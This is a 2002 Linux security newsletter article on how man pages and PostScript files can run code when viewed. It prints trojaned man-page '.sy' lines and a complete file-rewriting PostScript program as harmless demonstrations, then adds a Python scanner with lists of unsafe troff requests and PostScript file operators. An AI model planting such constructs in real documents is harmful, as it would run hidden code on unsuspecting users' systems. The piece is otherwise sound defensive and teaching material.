Executing Code From Non-executable Files
LINUX SECURITY --- August 27, 2002
Published by ITworld.com -- changing the way you view IT
http://www.itworld.com/newsletters
________________________________________________________________________________
HIGHLIGHTS
* With a little creativity and effort, those innocuous-looking, non-executable
  file formats may be made more dangerous than they appear.
________________________________________________________________________________
Executing Code From Non-executable Files
By Brian Hatch

We're all told about the hazards of running untrusted executables. If a
friend sends you the latest and greatest program, can you be sure that it
was really him, as opposed to someone forging the email address? Or perhaps
it's a virus or worm. Or perhaps your friend is just malicious and wants you
to run a program that has 'rm -rf /' in it.

What some may not realize is that some non-executable file formats have the
potential to run malicious code. A few weeks ago I challenged folks to
create a file that, when viewed with a standard tool, would be able to
perform system actions. In this case, the payload should take the file
'modifyme' and delete its first four bytes. In real life, you'd expect
something more interesting, such as binding a shell to a network port or
creating a setuid binary.

The first one we'll look at is a man page. Man pages are usually stored in
directories such as /usr/man/ or /usr/share/man, written in a markup
language that troff processes. For example, on my system, the source to the
p0f man page looks like this:

.TH P0F 1
.\" NAME should be all caps, SECTION should be 1-8, maybe w/
subsection
.\" other parms are allowed: see man(7), man(1)
.SH NAME
p0f \- identify remote systems passively
.SH SYNOPSIS
.B p0f
.I "[ -f file ] [ -i device ] [ -o file ] [ -s file ] [ -vKUtq ] [ 'filter rule' ]"
.br
.SH "DESCRIPTION"
This manual page briefly documents the
.BR p0f
command.
...

It is stored in /usr/share/man/man1/p0f.1, so when you type 'man p0f', man
runs this file through various parsing programs and, in the end, shows you
a readable version like this:

P0F(1)                                                    P0F(1)

NAME
       p0f - identify remote systems passively

SYNOPSIS
       p0f [ -f file ] [ -i device ] [ -o file ] [ -s file ] [ -vKUtq ]
       [ 'filter rule' ]

DESCRIPTION
       This manual page briefly documents the p0f command.
...

One of the parsers invoked by man is troff. All those lines beginning
with '.' are troff requests (or calls to macros built from them), which are
used to specify indentation, boldness, and such. It's an ancient language,
created eons before HTML. In addition to the formatting requests, there are
a couple of requests that allow you to run commands. The easiest is '.sy',
which hands the rest of the line to the shell. To make the p0f man page
strip the leading four bytes from the file, we just add the following to
the p0f.1 file:

.sy dd if=modifyme of=modifyme.tmp ibs=4 skip=1 >/dev/null 2>&1
.sy mv modifyme.tmp modifyme >/dev/null 2>&1

The text after the .sy request is run by troff during the man page
formatting process, in this case editing the modifyme file using dd (ibs=4
skip=1 skips the first four-byte input block). It runs as whoever is
formatting the page, with whatever privileges the formatter has. The next
time you run 'man p0f' you'll be silently running the code hidden in the
manual page.

Think of how many pieces of third-party software you've installed, many of
which come with manual pages. If you had time to vet the source code, did
you even think of looking at the man pages for hidden trojans like this
one? Probably not.

Luckily, GNU troff (groff), which is what Linux systems use, disables the
unsafe requests by automatically loading the 'safer' macro file. This file
is read unless you explicitly pass '-U' (unsafe mode) on the troff command
line. Since 'man' does not pass '-U', you are safe. All of the unsafe troff
requests (open, opena, pso, sy, and pi) are disabled by default; on groff
you can confirm this by reading safer.tmac in the tmac directory, which
simply removes those requests.

Unfortunately, this isn't the case with other Unix systems. My Solaris 8
host, for example, is still vulnerable to this simple trick.

Next, let's look at another example, a PostScript file. Just like man
pages, PostScript is more powerful than you might imagine. It is a full
programming language: in addition to its ability to describe a
viewable/printable page, it has procedures, conditionals and loops, and
operators to open, read, write and close files. It's powerful enough that a
Web server [1] has even been written using nothing but PostScript.

So, let's take a look at a simple PostScript file, stripfourbytes.ps:

%!
% Define a few file handles
/stdout (%stdout) (w) file def
% Open our input and output files.
% Can't get easier than this.
(modifyme) /input exch (r) file def
(modifyme.out) /output exch (w) file def
% strip those four bytes: read and discard the first four bytes of input
% (readstring leaves the substring and a boolean on the stack; drop both)
/fourbytes 4 string def
input fourbytes readstring pop pop
% copy the rest of the input to the output, 1024 bytes at a time
/buffer 1024 string def
{
input buffer readstring
{ output exch writestring }
{ output exch writestring input closefile exit } ifelse
} bind loop
output closefile
stdout (You have been cracked.\n) writestring
quit

Rather than using any external programs, I wrote this to be
self-contained. To execute it, you simply need to 'view' the PostScript
file with 'gs stripfourbytes.ps'.

Luckily, ghostscript (gs) is usually not the default PostScript viewer.
Ghostview (and gv) is actually a front end that runs gs for you, but by
default it starts gs with -dSAFER, which disables the deletefile and
renamefile operators and refuses to open files for writing (newer versions
restrict reading as well). Under -dSAFER the file above fails when it tries
to open modifyme.out instead of running to completion. If you run gs by
hand on PostScript you didn't write, pass -dSAFER yourself; plain
'gs file.ps' gives the document the same access to your files that you
have.

Congratulations go out to Michael Metheringham for coming up with a
trojaned PostScript file and Gina Vancura for creating a trojaned man
page. Also, Andrew Klaassen came up with a man page example [2] that,
though it did not contain any exploit, was certainly the funniest thing
I'd seen in a long time.

Thus far, no one has attempted to embed such an exploit into a LaTeX,
PDF, or image file, but I'll leave the challenge open to anyone who
wants to try. I have never tried, so I don't know offhand if they're
possible. I'd think one in LaTeX should be possible, but PDF and
graphics are likely out of the running.
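In both examples the dangerous construct is a plain text token sitting in a file nobody reads, so the obvious check is to look for it before the file is installed. The scanner below is an added example, not code from the article or from the groff or Ghostscript projects. It reports the unsafe troff requests named above (following .als and .rn aliases, which could hide .sy behind a harmless-looking name) and, for PostScript, the operators that open, delete, rename or execute files, ignoring anything inside comments and string literals. The embedded man page and PostScript fragments are constructed from the article's own examples; the alias and quote-prefixed lines and the PostScript operator list (file, run, deletefile, renamefile, filenameforall) are my additions, not something the article enumerates.

```python
"""Scan troff (man page) sources and PostScript files for the constructs the
article describes: requests that run commands, operators that open files."""
import re
from typing import List, Tuple

UNSAFE_TROFF_REQUESTS = frozenset({"sy", "pi", "open", "opena", "pso"})  # groff's safer list
ALIAS_REQUESTS = frozenset({"als", "rn"})  # can hide an unsafe request behind another name
# A request line: control character ('.' or "'") in column 1, optional blanks, the
# request name, its arguments.  '.\"' comments do not match.  Assumes the default
# control characters; a file could change them with .cc, which this does not track.
_TROFF_REQUEST = re.compile(r"^[.']\s*([A-Za-z0-9_]+)\s*(.*)$")

# Operators that reach outside the page (my choice of list, not the article's).
PS_FILE_OPERATORS = frozenset({"file", "run", "deletefile", "renamefile", "filenameforall"})
_PS_OPERATOR = re.compile(r"(?<![A-Za-z0-9_])(%s)(?![A-Za-z0-9_])"
                          % "|".join(sorted(PS_FILE_OPERATORS)))

def scan_troff(source: str) -> List[Tuple[int, str, str]]:
    """(line, request, arguments) for every unsafe request; .als/.rn aliases are followed."""
    aliases, findings = {}, []  # alias name -> the unsafe request it stands for
    for lineno, line in enumerate(source.splitlines(), start=1):
        m = _TROFF_REQUEST.match(line)
        if not m:
            continue
        request, args = m.group(1), m.group(2)
        if request in ALIAS_REQUESTS:
            parts = args.split()
            if len(parts) < 2:
                continue
            # groff syntax is '.als new old' but '.rn old new'
            new, old = (parts[0], parts[1]) if request == "als" else (parts[1], parts[0])
            target = aliases.get(old, old)
            if target in UNSAFE_TROFF_REQUESTS:
                aliases[new] = target
                findings.append((lineno, request, args))
            continue
        target = aliases.get(request, request)
        if target in UNSAFE_TROFF_REQUESTS:
            findings.append((lineno, target, args))
    return findings

def _blank_ps_comments_and_strings(source: str) -> str:
    """Overwrite %-comments and (...) string contents with spaces so the token search
    cannot match inside them; newlines are kept so line numbers survive.  Strings nest
    and use backslash escapes.  Hex (<..>) and ASCII85 (<~..~>) strings are not handled."""
    out, depth, in_comment, i, n = [], 0, False, 0, len(source)
    while i < n:
        ch = source[i]
        if ch == "\n":
            out.append("\n")
            in_comment = False
        elif in_comment:
            out.append(" ")
        elif depth > 0:  # inside a string
            if ch == "\\" and i + 1 < n:  # escaped character; keep an escaped newline
                i += 1
                out.append(" " + ("\n" if source[i] == "\n" else " "))
            else:
                depth += {"(": 1, ")": -1}.get(ch, 0)
                out.append(" ")
        elif ch == "%":
            in_comment = True
            out.append(" ")
        elif ch == "(":
            depth = 1
            out.append(" ")
        else:
            out.append(ch)
        i += 1
    return "".join(out)

def scan_postscript(source: str) -> List[Tuple[int, str]]:
    """(line, operator) for each file operator outside comments and strings.  Name
    literals such as /file are reported too: '/file load exec' reaches the operator."""
    cleaned = _blank_ps_comments_and_strings(source)
    return [(lineno, m.group(1))
            for lineno, line in enumerate(cleaned.splitlines(), start=1)
            for m in _PS_OPERATOR.finditer(line)]

# Constructed samples: the article's p0f.1 fragment with its two .sy lines, plus an
# aliased and a quote-prefixed variant (mine); and a cut-down stripfourbytes.ps.
TROJANED_MAN_PAGE = r"""
.TH P0F 1
.\" NAME should be all caps, SECTION should be 1-8
.SH NAME
p0f \- identify remote systems passively
.sy dd if=modifyme of=modifyme.tmp ibs=4 skip=1 >/dev/null 2>&1
.sy mv modifyme.tmp modifyme >/dev/null 2>&1
.als say sy
.say echo hidden
'  pi /bin/cat
""".strip()
STRIPFOURBYTES_PS = r"""
%!
/stdout (%stdout) (w) file def
(modifyme) /input exch (r) file def
(modifyme.out) /output exch (w) file def
(the word file in a string \) is data) pop  % and so is file in a comment
quit
""".strip()
```

Run scan_troff over every *.1 to *.8 file in a package before installing it and scan_postscript over anything you intend to hand to gs without -dSAFER; a hit is not proof of a trojan (a legitimate page might use .pso on purpose), but it is a line worth reading before the formatter does.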
NOTES
[1] http://itw.itworld.com/GoNow/a14724a63421a102359357a8 written by Anders Karlsson.
[2] http://itw.itworld.com/GoNow/a14724a63421a102359357a1
________________________________________________________________________________
About the author(s)
-------------------
Brian Hatch is Chief Hacker at Onsight, Inc, and author of Hacking
Linux Exposed and Building Linux VPNs. He once wrote the PostScript
version of his resume from top to bottom using nothing but vi. He's
happy to say he doesn't remember PostScript that well any more. Brian
can be reached at [EMAIL PROTECTED]
________________________________________________________________________________
Copyright 2002 ITworld.com, Inc., All Rights Reserved.
